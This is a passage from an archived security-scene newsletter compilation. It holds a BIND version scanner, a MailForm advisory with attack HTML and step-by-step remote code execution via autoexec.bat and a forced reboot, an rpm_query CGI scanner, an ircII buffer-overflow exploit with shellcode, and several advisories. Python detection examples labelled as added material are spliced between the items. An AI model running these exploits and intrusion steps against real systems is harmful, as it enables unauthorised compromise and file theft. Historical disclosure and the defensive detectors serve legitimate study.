              PUTSHORT(C_IN, ptr);
              PUTLONG(ttl, ptr);
              PUTSHORT(addrlen, ptr);
              PUTLONG(addr, ptr);
              pktlen += (sizeof(short) * 3) + (sizeof(long) * 2);
           }
         /* if we're debugging, show what we just made */
      /* #ifdef DEBUG
         print_dnspkt(pktbuf, pktbuf + pktlen);
      #endif */
         return pktlen;
      }
      
       int checknamed(char *verstr)
       {
         /* version strings the author considers exploitable */
         if (strstr(verstr, "4.9.5") || strstr(verstr, "4.9.6-REL") ||
             strstr(verstr, "4.9.5-REL") || strstr(verstr, "4.9.5-P1") ||
             strstr(verstr, "8.1-REL") || strstr(verstr, "8.1.1") ||
             strstr(verstr, "8.2") || strstr(verstr, "8.2.1"))
           {
             /* "8.2" also matches the patched 8.2.2-P2 .. P5 releases; exclude them */
             if (strstr(verstr, "8.2.2-P5") || strstr(verstr, "8.2.2-P4") ||
                 strstr(verstr, "8.2.2-P3") || strstr(verstr, "8.2.2-P2"))
               {
                 printf("<[Named Version [%s] ]>\n", verstr);
                 return(0);
               }
             printf("<[Named version [%s]]> Possible Vuln\n", verstr);
           }
         else
           {
             printf("<[No named vulns found. version [%s]]>\n", verstr);
           }
       
         return(0);
       }   
      
      
      void
      print_ver(host, vul, buf)
         char *host, *buf;
         int vul;
      {
         HEADER *dnsh = (HEADER *)buf;
         char *ptr, *verstr;
         int len;
      
         if (dnsh->rcode != 0)
           {
      /*      printf("%s's named that %s iquery does not respond to version.bind.\n", host, vul ? "supports" : "errors on"); */
              return;
           }
         /* So we actually have a response.  Lets skip the crap, starting with the header */
         ptr = (buf + sizeof(HEADER));
         /* then the question section domain name. */
         while (*ptr != '\0')
           ptr++;
         /* then the trailing null and the type/class of the question */
         ptr += 1 + (sizeof(short) * 2);
         /* now we skip the answer section domain name. (should be the same as the question) */
         while (*ptr != '\0')
           ptr++;
         /* don't forget the trailing null, type, class, and time to live. */
         ptr += 1 + (sizeof(long) + (sizeof(short) * 2));
         /* Here we are at the resource record data length, extract it */
         GETSHORT(len, ptr);
         /* avoid the need to decompress the string (treat it as one) */
         ptr++;
         /* allocate space for and copy the version response txt */
         verstr = (char *)malloc(len);
         memset(verstr, 0, len);
         memcpy(verstr, ptr, len-1);
         /* run through the version string and replace non-printable and non-whitespace characters
            with a '.' */
         for (ptr = verstr; ptr - verstr != len - 1; ptr++)
            if (!isprint(*ptr) && !isspace(*ptr))
               *ptr = '.';
         /* print the version and iquery support status, woo hoo */
         #ifdef debugz
          printf("%s's named that %s iquery is version: %s\n", host, vul ? "supports" : "errors on", verstr); 
         #endif
         checknamed(verstr);
      }
      
      /*
       * handle the alarm signal by resetting the alarm timer and
       * the signal handler for SIGALRM.  This stuff probably isn't needed,
       * but I did it anyway.  It's good for debugging, ran into some problems with
       * alarm() not doing its job.
       */
      void
      handle_alarm(signum)
         int signum;
      {
         alarm(0);
         signal(SIGALRM, SIG_DFL);
      /* #ifdef DEBUG
         printf("received alarm\n");
      #endif */
      }
      
      int main(int argc, char *argv[])
      {
         struct hostent *he;
         struct sockaddr_in ra;

         if (argc < 2 || argv[1] == NULL)
           {
              printf("coded by eth0 [b0f]\n");
              printf("Usage: %s [host]\n", argv[0]);
              exit(1);
           }

         /* make sure the name resolves before going any further */
         if ((he = gethostbyname(argv[1])) == NULL)
           {
              herror("gethostbyname");
              exit(1);
           }
         /* lookup_host() and probe_bind() are defined above in this program */
         if (!lookup_host(&ra, argv[1], NAMESERVER_PORT))
           return 1;
         srand(time(NULL));

         probe_bind(ra);
         return(0);
      }
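      The probe above hand-builds a CHAOS-class TXT query for version.bind and then walks the reply by pointer arithmetic, deliberately skipping name decompression. What follows is an added example, not part of the original program, written from the sensor side: a small Python parser for the question section of a DNS packet (including RFC 1035 name compression, with the backwards-pointer check that stops pointer loops) that flags CHAOS-class version.bind and hostname.bind questions, which is the signature a network monitor would watch for. The sample packets, the helper that builds them and all function names are constructed here; they are not the probe's own code.

```python
import struct

# RFC 1035 values: TXT record type, CHAOS class
QTYPE_TXT = 16
QCLASS_CH = 3


def build_query(name, qtype, qclass, txid=0x1337):
    """Build a minimal DNS query (header + one question).
    Constructed helper for sample input only; not the probe's packet builder."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.strip(".").split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, qclass)


def parse_name(pkt, offset):
    """Decode a possibly compressed domain name starting at offset.
    Returns (lower-cased name, offset just after the name in the stream)."""
    labels = []
    end = None          # set when we follow a pointer: where the name ends in the stream
    hops = 0
    while True:
        if offset >= len(pkt):
            raise ValueError("truncated name")
        length = pkt[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if offset + 1 >= len(pkt):
                raise ValueError("truncated pointer")
            pointer = struct.unpack(">H", pkt[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2
            hops += 1
            # pointers must refer to an earlier occurrence; this also kills loops
            if hops > 16 or pointer >= offset:
                raise ValueError("bad compression pointer")
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(pkt[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels).lower(), (end if end is not None else offset)


def parse_questions(pkt):
    """Return [(qname, qtype, qclass), ...] from the question section."""
    if len(pkt) < 12:
        raise ValueError("short header")
    qdcount = struct.unpack(">H", pkt[4:6])[0]
    offset = 12
    questions = []
    for _ in range(qdcount):
        name, offset = parse_name(pkt, offset)
        if offset + 4 > len(pkt):
            raise ValueError("truncated question")
        qtype, qclass = struct.unpack(">HH", pkt[offset:offset + 4])
        offset += 4
        questions.append((name, qtype, qclass))
    return questions


def version_probe_names(pkt):
    """Names of CHAOS-class version.bind / hostname.bind questions in pkt.
    An empty list means the packet is not a version probe (or is malformed)."""
    try:
        questions = parse_questions(pkt)
    except (ValueError, struct.error):
        return []
    return [name for name, _qtype, qclass in questions
            if qclass == QCLASS_CH and name in ("version.bind", "hostname.bind")]


def scan_packets(packets):
    """Return (packet index, probed name) for every packet that is a version probe."""
    alerts = []
    for i, pkt in enumerate(packets):
        for name in version_probe_names(pkt):
            alerts.append((i, name))
    return alerts


# Constructed sample traffic: a normal lookup, a probe like the one the program
# above sends, a truncated packet, and a two-question packet whose second name
# is a compression pointer back to the first.
COMPRESSED_PROBE = (struct.pack(">HHHHHH", 1, 0x0100, 2, 0, 0, 0)
                    + b"\x07version\x04bind\x00" + struct.pack(">HH", QTYPE_TXT, QCLASS_CH)
                    + b"\xc0\x0c" + struct.pack(">HH", QTYPE_TXT, QCLASS_CH))
SAMPLE_PACKETS = [
    build_query("www.example.com", 1, 1),
    build_query("version.bind", QTYPE_TXT, QCLASS_CH),
    build_query("version.bind", QTYPE_TXT, QCLASS_CH)[:20],
    COMPRESSED_PROBE,
]

if __name__ == "__main__":
    for idx, name in scan_packets(SAMPLE_PACKETS):
        print(f"packet {idx}: CHAOS-class query for {name}")
```

      On the server side the same string is what the `version` option in the `options` block of named.conf controls; setting it to a fixed value means a probe like the one above learns nothing, while the sensor rule still tells you who asked.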
      
      
      @HWA      
      
249.0 PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced from Packetstorm
      http://packetstorm.securify.com/

      Advisory: MailForm v1.91 for Windows 95 and NT 4.0
      Chopsui-cide[MmM]
      The Mad Midget Mafia - http://midgets.box.sk/
      =======================================================================
      Do not save this with any editor, or _vital_ formatting may be lost.
      
      Disclaimer:
      =============
      This document is intended as an advisory, and I cannot be held
      accountable for its misuse. The reader assumes all responsibility for
      his/her use of this information.
      
      Summary:
      ==========
      Date released: 07/04/2000 (dd/mm/yyyy).
      Risk: denial of service, reading of private files, appending to
      private files, full system compromise if the aforementioned risks
      are leveraged properly.
      Vulnerability found by: Chopsui-cide
      Vulnerable: MailForm v1.91, probably prior versions (not tested).
      Immune: ?
      
      MailForm allows potentially dangerous parameters to be specified by
      anyone who can execute it. These allow for reading and writing of
      files on the system on which MailForm resides.
      
      Details:
      ==========
      Problem fields:
      _1_TextLog -
      _1_HTMLLog - these two are the ones used to write to files.
      _1_MailTemplate - this is what is used to retrieve files.
      _1_INIFile - possibly dangerous, but not discussed here.
      _1_MailServer - we can just change this to our own address.
      _1_MailTo - we don't even need to bother with this.
      
      It's fairly obvious where the problem lies here. We can specify any
      file to send + the POP server to send it to. The con\con bug may also
      be used to bring down the entire system. Template files will be cut
      off at the first null character, so retrieving binaries is not
      practical. Trying to retrieve certain files will cause MailForm to
      crash.
      
      A very crude example of how to run code on the remote system is
      provided in the last section of this advisory.
      
      Implementation: web interface
      ===============================
      I have constructed some html that allows an attacker to download and
      append to files on any remote system running MailForm (cut where it
      says [snip], obviously):
      
      [snip]
      <html>
      <head>
      <title>Web interface for MailForm vulnerabilities.</title>
      </head>
      <body bgcolor="#FFFFFF">
      Do not be alarmed by any "Form submission failed" errors. These are
      normal. You will need to modify the form tags in this page to
      correspond to the host being attacked.<br>
      <br>
      Download file:<br>
      
                <form method="POST" action="http://localhost/cgi-bin/mailform.exe">
                  <input type="text" name="_1_MailServer" value="yourhost"><br>
                  <input type="text" name="_1_MailTemplate" value="..\xitami.aut"><br>
                      <input type="hidden" size="30" name="_1_MailTo" value="me@isp.com">
                      <input type="hidden" size="40" name="Name" value="me">
                  <input type="submit" value="Send" name="_2_Submit">
                </form>
      <br>
      Append to file:<br>
      Note: your text will be preceded by garbage.<br>
                <form method="POST" action="http://localhost/cgi-bin/mailform.exe">
                  <input type="hidden" name="_1_MailServer" value="x">
                  <input type="hidden" name="_1_MailTemplate" value="nul">
                  <input type="text" name="_1_TextLog" size="40" value="c:\autoexec.bat"><br>
                      <input type="hidden" size="30" name="_1_MailTo" value="me@isp.com">
                      <textarea name="Name" rows="4" cols="40"></textarea>
                  <br><input type="submit" value="Send" name="_2_Submit">
                </form>
      <a href="http://midgets.box.sk">The Mad Midget Mafia</a><br>
      </body>
      </html>
      [snip]
      
      The e-mail will be sent to the host you specify on port 25. It should
      be easy enough to capture using netcat.
      
      Implementation: full compromise
      =================================
      When appending text to files, the following kind of ugly crap
      precedes it:
      [snip]
      Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1
      
      Name:
      [snip]
      Even with this handicap, we can still modify/create batch files.
      This is how we will execute code.
      
      The idea here is to create a kind of "script" for debug that will
      assemble and execute a small program. It is basically just a list of
      keystrokes. We then add an entry to autoexec.bat that executes it.
      First we need to upload the following file to c:\windows\script.txt
      [snip]
      
      a 100
      mov dx,10b
      mov ah,09
      int 21
      mov ah,4c
      int 21
      db "Code has been executed.",0d,0a,"$"
      
      g=100
      q
      [snip]
      
      Make sure at the end of each line there is _no_ carriage return. Each
      line should be terminated by \x0a (linefeed). Get rid of the carriage
      returns (\x0d), ie:
      a 100
      mov dx,10b
      mov ah,09
      int 21
      mov ah,4c
      int 21
      db "Code has been executed.",0d,0a,"$"
      
      g=100
      q
      
      
      Add a newline (\x0d,\x0a) before the above, and submit the two lines
      using the web-based interface.
      
      Add the following line to any batch file that is executed upon start-up
      (ie, autoexec.bat):
      debug < c:\windows\script.txt
      
      Check that everything is in order by trying to download both script.txt
      and the batch file you modified.
      
      Force a reboot using the con\con vulnerability. Once it restarts, the
      code will be executed. I know this is a really ugly hack, but it works
      (poor excuse). Also, make sure the garbage doesn't interfere with
      anything (always put a newline before the start of your commands).
      
      =======================================================================
      
      @HWA      
      
250.0 PSS: CGI rmp_query scanner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /*
      
        rmp_query : /cgi-bin/rmp_query server scanning program.
                        Scanner by Alhambra (slightly modified)
      
          A vulnerability exists  in the default installation
          of  Caldera OpenLinux 2.3.  A  CGI is  installed in
          /home/httpd/cgi-bin/ named  rpm_query. Any user can
          run this CGI  and obtain a listing of the packages,
          and versions of packages, installed on this system.
          This could  be used  to  determine  vulnerabilities
          on the machine remotely.
        
        Usage:
              rmp_query < infile > outfile    (one hostname per line on stdin)
      
      */
      
      
      #include <sys/stat.h>
      #include <sys/types.h>
      #include <termios.h>
      #include <unistd.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <fcntl.h>
      #include <signal.h>
      #include <sys/syslog.h>
      #include <sys/param.h>
      #include <sys/times.h>
      #ifdef LINUX
      #include <sys/time.h>
      #endif
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <arpa/inet.h>
      #include <netdb.h>

      int FLAG = 1;

      /* SIGALRM handler: the connect() took longer than the alarm allowed */
      void Call(int signo)
      {
       FLAG = 0;
      }
      
      int main (int argc, char *argv[])
      {
        char host[100], hosta[1024], FileBuf[8097];
        int outsocket, X;
        struct hostent *nametocheck;
        struct sockaddr_in serv_addr;
        struct in_addr outgoing;
      
        char rmpMessage[]="GET /cgi-bin/rmp_query\n";

        /* one hostname per line on stdin; each host's response goes to stdout */
        while(fgets(hosta,100,stdin))
        {
          if(hosta[0] == '\0')
          break;
          hosta[strcspn(hosta, "\r\n")] = '\0';   /* strip the trailing newline */
          write(1,hosta,strlen(hosta));
          write(1,"\n",1);

          nametocheck = gethostbyname (hosta);
          if (nametocheck == NULL)
          {
            herror(hosta);   /* unresolvable name: skip it instead of dereferencing NULL */
            continue;
          }
          outsocket = socket (AF_INET, SOCK_STREAM, 0);
          memset (&serv_addr, 0, sizeof (serv_addr));
          serv_addr.sin_family = AF_INET;
          memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof(outgoing.s_addr));
          strcpy (host, inet_ntoa (outgoing));
          serv_addr.sin_addr.s_addr = inet_addr (host);
          serv_addr.sin_port = htons (80);
          signal(SIGALRM,Call);
          FLAG = 1;
      
          alarm(10);    /* give the connect() ten seconds */
          X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
          alarm(0);
      
          if(FLAG == 1 && X==0){
            write(outsocket,rmpMessage,strlen(rmpMessage));
            /* read() returns 0 at EOF and -1 on error; stop on either */
            while((X=read(outsocket,FileBuf,8096)) > 0) write(1,FileBuf,X);
          }
        close (outsocket);   
        }
        return 0;
      }
      
      
      @HWA            
      
251.0 PSS:New ircii exploit
      ~~~~~~~~~~~~~~~~~~~~~
      
      /*
      
        ircii-4.4 exploit by bladi & aLmUDeNa
      
        buffer overflow in ircII's DCC chat handling
        allows execution of arbitrary code
      
        Affected:
                 ircII-4.4
      
        Patch:
               Upgrade to ircII-4.4M
        ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
      
        Offset:
               SuSe 6.x :0xbfffe3ff
               RedHat   :0xbfffe888
      
        Thanks to : #warinhell,#hacker_novatos
        Special thanks go to: Topo[lb],
              Greetings to everyone who knows us, especially to eva ;)
                                               (bladi@euskalnet.net)
      */
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <netdb.h>
      #include <string.h>
      #include <signal.h>
      #include <unistd.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <arpa/inet.h>
      
      char *h_to_ip(char *hostname);
      char *h_to_ip(char *hostname) {
        struct hostent *hozt;
        struct sockaddr_in tmp;
        struct in_addr in;
        if ((hozt=gethostbyname(hostname))==NULL)
            {
            printf(" ERROR: IP incorrecta\n");
            exit(0);
            }
        memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
        memcpy(&in,&tmp.sin_addr.s_addr,4);
        return(inet_ntoa(in));
      }
      int main(int argc, char *argv[])
      {
        struct sockaddr_in sin;
        char *hostname;
        char nops[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
        char *shell =
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/sh";
        int outsocket,tnt,i;
        printf (" irciismash  ver: 1.0\n");
        printf ("         by         \n");
        printf ("  bladi & aLmUDeNa\n\n");
      
        if (argc<3)
        {
          printf("Usage : %s hostname port\n",argv[0]);
          exit(-1);
        }
        hostname=argv[1];
        outsocket=socket(AF_INET,SOCK_STREAM,0);
        sin.sin_family=AF_INET;
        sin.sin_port=htons(atoi(argv[2]));
        sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
        if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
          printf(" ERROR: El puerto esta cerradito :_(\n");
          exit(0);
        }
        printf("[1]- Noping\n    [");
        for(i=0;i<47;i++)
        {
          if(!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
          write(outsocket,nops,strlen(nops));
        }
        printf("]\n");
        printf("     Noped\n");
        printf("[2]- Injectin shellcode\n");
        write(outsocket,shell,strlen(shell));
        usleep(999);
        printf("     Injected\n");
        printf("[3]- Waiting\n [");
        for(i=0;i<299;i++)
        {
          printf(".");
          fflush(stdout);
          usleep(99);
          write(outsocket,"\xff",strlen("\xff"));
          write(outsocket,"\xbf",strlen("\xff"));
          write(outsocket,"\xff",strlen("\xe9"));
          write(outsocket,"\xe3",strlen("\xff"));
        }
        printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
        close(outsocket);
        return 0;
      }
      /*                    www.hack.co.za                    */
      
      
      @HWA            
      
252.0 PSS:Cerberus Information Security Advisory (CISADV000330)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Cerberus Information Security Advisory (CISADV000330)
      http://www.cerberus-infosec.co.uk/advisories.shtml
      
      Released         : 30th March 2000
      Name             : Index Server (Strike 3!)
      Affected Systems : Microsoft Internet Information Server
      Issue            : Attackers can gain source of ASP and other pages
      Author           : David Litchfield (mnemonix@globalnet.co.uk)
      
      Description
      ***********
      The Cerberus Security Team has found a third issue with Microsoft's Index
      Server that affects any web site running Internet Information Server 4 or 5
      with Index Server, even if the recent Index Server patch has been installed
      and even if no .htw files exist on the file system. These systems are at
      risk of having the source of ASP pages or other files such as the
      global.asa revealed. Often these files contain sensitive information such
      as user IDs, passwords and database source names that are of use to an
      attacker attempting to break into a site/network.
      
      
      Details
      *******
      If a request is made to
      http://charon/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full
      only the HTML a user would normally see is returned. However, by appending a
      %20 to the end of the CiWebHitsFile parameter:
      http://charon/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
      it is possible to get the full source.
      
      Part of the problem exists because 'null.htw' is not a real file that maps
      to any file on the file system; rather it is a 'virtual file' held in
      memory, so even if there are no real .htw files on the file system, IIS
      boxes with Index Server will still be at risk. Any request made to null.htw
      is dealt with by webhits.dll.
      
      Solution
      ********
      If the functionality provided by webhits is needed, install Microsoft's patch.
      If the functionality is not needed, however, simply unmap the .htw extension
      from webhits.dll using the Internet Service Manager MMC snap-in.
      A check for this issue already exists in our security scanner, CIS.
      More details about CIS can be found on our web site:
      http://www.cerberus-infosec.com
      
      Vendor Status
      *************
      Microsoft were alerted to this issue on the 23rd of February and
      have updated an earlier patch, information about which can be found at
      http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
      
      About Cerberus Information Security, Ltd
      ********************************
      Cerberus Information Security, Ltd, a UK company, are specialists in
      penetration testing and other security auditing services. They are the
      developers of CIS (Cerberus' Internet security scanner) available for free
      from their website: http://www.cerberus-infosec.com
      
      To ensure that the Cerberus Security Team remains one of the strongest
      security audit teams available globally they continually research operating
      system and popular service software vulnerabilities leading to the discovery
      of "world first" issues. This not only keeps the team sharp but also helps
      the industry and vendors as a whole ultimately protecting the end consumer.
      As testimony to their ability and expertise one just has to look at exactly
      how many major vulnerabilities have been discovered by the Cerberus Security
      Team - over 50 to date, making them a clear leader of companies offering
      such security services.
      
      Founded in late 1999, by Mark and David Litchfield, Cerberus Information
      Security, Ltd are located in London, UK but serves customers across the
      World. For more information about Cerberus Information Security, Ltd please
      visit their website or call on +44(0) 181 661 7405
      
      Permission is hereby granted to copy or redistribute this advisory but only
      in its entirety.
      
      Copyright (C) 2000 by Cerberus Information Security, Ltd
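      Three of the web-facing issues in this issue (MailForm's file parameters in 249.0, the package-listing CGI in 250.0, and the webhits trailing-space request described above) each leave a recognisable request line. The following is an added example, written for this edition and not taken from any of the advisories or vendors, of detection logic run over constructed Common Log Format lines: it flags the rpm_query CGI path, any .htw request whose CiWebHitsFile value ends in whitespace, and mailform.exe requests that carry the file-naming fields. One caveat a practitioner will want: MailForm's fields normally travel in a POST body, which an access log does not record, so the MailForm rule only fires when they appear in the query string; catching them in the body needs a proxy or server module that inspects request bodies. The rule names, function names and sample lines are all constructed here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# MailForm fields that name files on the server (listed in advisory 249.0)
MAILFORM_FILE_PARAMS = {"_1_mailtemplate", "_1_textlog", "_1_htmllog", "_1_inifile"}


def classify_request(target):
    """Return the names of the rules matched by a request target (path + query)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = {k.lower(): v for k, v in
              parse_qs(parts.query, keep_blank_values=True).items()}
    hits = []

    # 250.0: anyone can call the package-listing CGI
    if path.endswith(("/cgi-bin/rmp_query", "/cgi-bin/rpm_query")):
        hits.append("rpm_query package enumeration")

    # 252.0: webhits.dll returns page source when CiWebHitsFile ends in %20
    if path.endswith(".htw"):
        for value in params.get("ciwebhitsfile", []):
            if value != value.rstrip():       # parse_qs has already decoded %20
                hits.append("Index Server webhits source disclosure")
                break

    # 249.0: MailForm file parameters supplied by the client in the query string
    if path.endswith("mailform.exe") and params.keys() & MAILFORM_FILE_PARAMS:
        hits.append("MailForm file-access parameters in request")

    return hits


def analyze_log(text):
    """Scan CLF text; return (client_ip, target, rule) for every matched rule."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue          # not CLF; a real deployment would count these
        for rule in classify_request(m.group("target")):
            findings.append((m.group("ip"), m.group("target"), rule))
    return findings


# Constructed sample log lines (not from any real server or from the advisories)
SAMPLE_LOG = """\
192.0.2.10 - - [07/Apr/2000:10:01:02 +0000] "GET /cgi-bin/rmp_query HTTP/1.0" 200 5120
192.0.2.11 - - [07/Apr/2000:10:02:03 +0000] "GET /null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0" 200 2048
192.0.2.12 - - [07/Apr/2000:10:03:04 +0000] "GET /null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full HTTP/1.0" 200 1024
192.0.2.13 - - [07/Apr/2000:10:04:05 +0000] "POST /cgi-bin/mailform.exe?_1_MailTemplate=..%5Cxitami.aut HTTP/1.0" 200 310
192.0.2.14 - - [07/Apr/2000:10:05:06 +0000] "GET /index.html HTTP/1.0" 200 1024
"""

if __name__ == "__main__":
    for ip, target, rule in analyze_log(SAMPLE_LOG):
        print(f"{ip} {rule}: {target}")
```

      The third sample line, a webhits request without the trailing space, is deliberately left unflagged: that is the ordinary behaviour of the feature, and alerting on every .htw request would drown the one that matters.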
      
      
      @HWA      
      
253.0 PSS:Win32 Realplayer 6/7 Buffer Overflow
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
      
      Win32 Realplayer 6/7 Buffer Overflow
      
      Vulnerability Summary:
      ----------------------
      There is a buffer overflow in the Win32 RealPlayer Basic client,
      versions 6 and 7.  This appears to occur when >299 characters
      are entered as a 'location' to play, such as http://aaaaa.....
      with 300 a's.  I have tested the MacOS and Linux Realplayer
      clients and have as yet not found such a vulnerability.
      
      Using the HTML "EMBED" tag to embed RealPlayer in a webpage
      and setting the "AUTOSTART=true" flag, you can force RealPlayer
      to start automatically, triggering the overflow condition.
      While I have not taken the time to find the proper entrance
      point in PNEN3260.DLL (which is what crashes, for example,
      in RealPlay 6 Basic), it appears that arbitrary code could
      be exploited simply by *VISITING* a webpage with the
      malicious embedded RealPlayer tags.
      
      (the following example is using RealPlayer v.6 Basic)
      
      In full effect, yo:
      -------------------
      For example: RealPlayer Win32 Version 6.0.7.380
      Type into "Location" http://aaaaaaaaaaa..... (300 a's)
      
      "This program has performed an illegal operation and will be shut
      down."
      REALPLAY caused an invalid page fault in
      module PNEN3260.DLL at 015f:6216d7ca.
      Registers:
      EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202
      EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88
      ECX=007c0350 DS=0167 ESI=007c0350 FS=629f
      EDX=00000001 ES=0167 EDI=007c0350 GS=0000
      Bytes at CS:EIP:
      ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d
      Stack dump:
      007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c
      6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100
      007c0100 00c6fed4
      
      Fun.   It looks like RealPlayer can be made to execute arbitrary
      code.  It gets worse, using the HTML EMBED tag for RealPlayer you
      can force a web browser (MSIE in this case) to crash as well.
      This is left as an exercise for the reader....
      
      Once you embed the RealPlayer in an html page, when Real crashes,
      it takes Internet Explorer with it...
      
      "This program has performed an illegal operation and will be shut
      down"
      IEXPLORE caused an invalid page fault in
      module KERNEL32.DLL at 015f:bff7a379.
      Registers:
      EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216
      EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864
      ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7
      EDX=084d0000 ES=0167 EDI=01615dac GS=0000
      Bytes at CS:EIP:
      89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50
      Stack dump:
      01615dac 00000000 084d000c 084d0000 084e5054
      00000000 00000000 00009afb 000084e6 0058d88c
      bff7a541 084d0000 084e5054 000003b4 00000000
      00000001
      
      
      and the extra bonus of:
      "This program has performed an illegal operation and will be shut
      down"
      IEXPLORE caused an invalid page fault in
      module PNEN3260.DLL at 015f:621874ba.
      Registers:
      EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202
      EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4
      ECX=08616860 DS=0167 ESI=086163e0 FS=3937
      EDX=61616161 ES=0167 EDI=8004004e GS=0000
      Bytes at CS:EIP:
      ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90
      Stack dump:
      08616b90 085e69f0 067dfeec 6218893b 085034ec
      00400050 00400000 00400000 067dff04 621838b4
      08616b90 04606568 0000023c 086163e0 067dff38
      62183a47
      
      load the malicious page enough times and you get a fun dialog box
      that just won't go away... unless you reboot.
      
      "This program has performed an illegal operation and will be shut
      down"
      IEXPLORE caused an invalid page fault in
      module KERNEL32.DLL at 015f:bff87eb5.
      Registers:
      EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206
      EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c
      ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f
      EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000
      Bytes at CS:EIP:
      53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
      Stack dump:
      
      etc etc etc.
      
      Resolution:
      -----------
      Vendor Notified 3 April 2000, 10:00 AM MST via email.
      Vendor patch should be forthcoming...
      
      ----------------------------------------------------
      -  Adam Muntner         \      Save the Whales!    -
      -  adam@alienzoo.com     \     Collect Valuable    -
      -  Systems Engineer       \        Prizes!         -
      -  http://www.alienzoo.com \                       -
      ----------------------------------------------------
      
      -----------------------------------------------------
          Get free email and alien enlightenment from
                   http://www.alienzoo.com
      
      
      @HWA      

254.0 ISS Security summary data sheet
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      -----BEGIN PGP SIGNED MESSAGE-----
      
      ISS Security Alert Summary
      April 1, 2000
      Volume 5 Number 3
       
      X-Force Vulnerability and Threat Database: http://xforce.iss.net/   To
      receive these Alert Summaries, subscribe to the ISS Alert mailing list.
      Send an email to majordomo@iss.net, and within the body of the message
      type:  'subscribe alert'.
       
      _____
       
      Contents
      
      33 Reported Vulnerabilities
       - windmail-pipe-command
       - windmail-fileread
       - simpleserver-exception-dos
       - linux-domain-socket-dos
       - linux-gpm-root
       - outlook-manipulate-hidden-drives
       - vqserver-dir-traverse
       - vqserver-passwd-plaintext
       - iis-chunked-encoding-dos
       - nav-email-gateway-dos
       - netscape-server-directory-indexing
       - mercur-webview-get-dos
       - officescan-admin-pw-plaintext
       - officescan-admin-access
       - linux-kreatecd-path
       - win-dos-devicename-dos
       - wmcdplay-bo
       - nt-registry-permissions
       - staroffice-scheduler-fileread
       - staroffice-scheduler-bo
       - iis-root-enum
       - mssql-query-abuse
       - clipart-cil-bo
       - oracle-installer
       - linux-rpm-query
       - thebat-mua-attach
       - irix-infosrch-fname
       - linux-dosemu-config
       - coldfusion-reveal-pathname
       - netscape-enterprise-command-bo
       - nmh-execute-code
       - htdig-remote-read
       - ie-html-shortcut
       
      Risk Factor Key
       
      _____
      
      Date Reported:          3/25/00
      Vulnerability:          windmail-pipe-command
      Platforms Affected:     WindMail 3.0
      Risk Factor:            High
      Attack Type:            Network Based
      
      WindMail is a command-line email messenger for Windows that can create
      mail forms for web sites from CGI scripts. By issuing an HTTP command that
      includes the pipe character, an attacker could execute arbitrary commands
      on the vulnerable system.
      
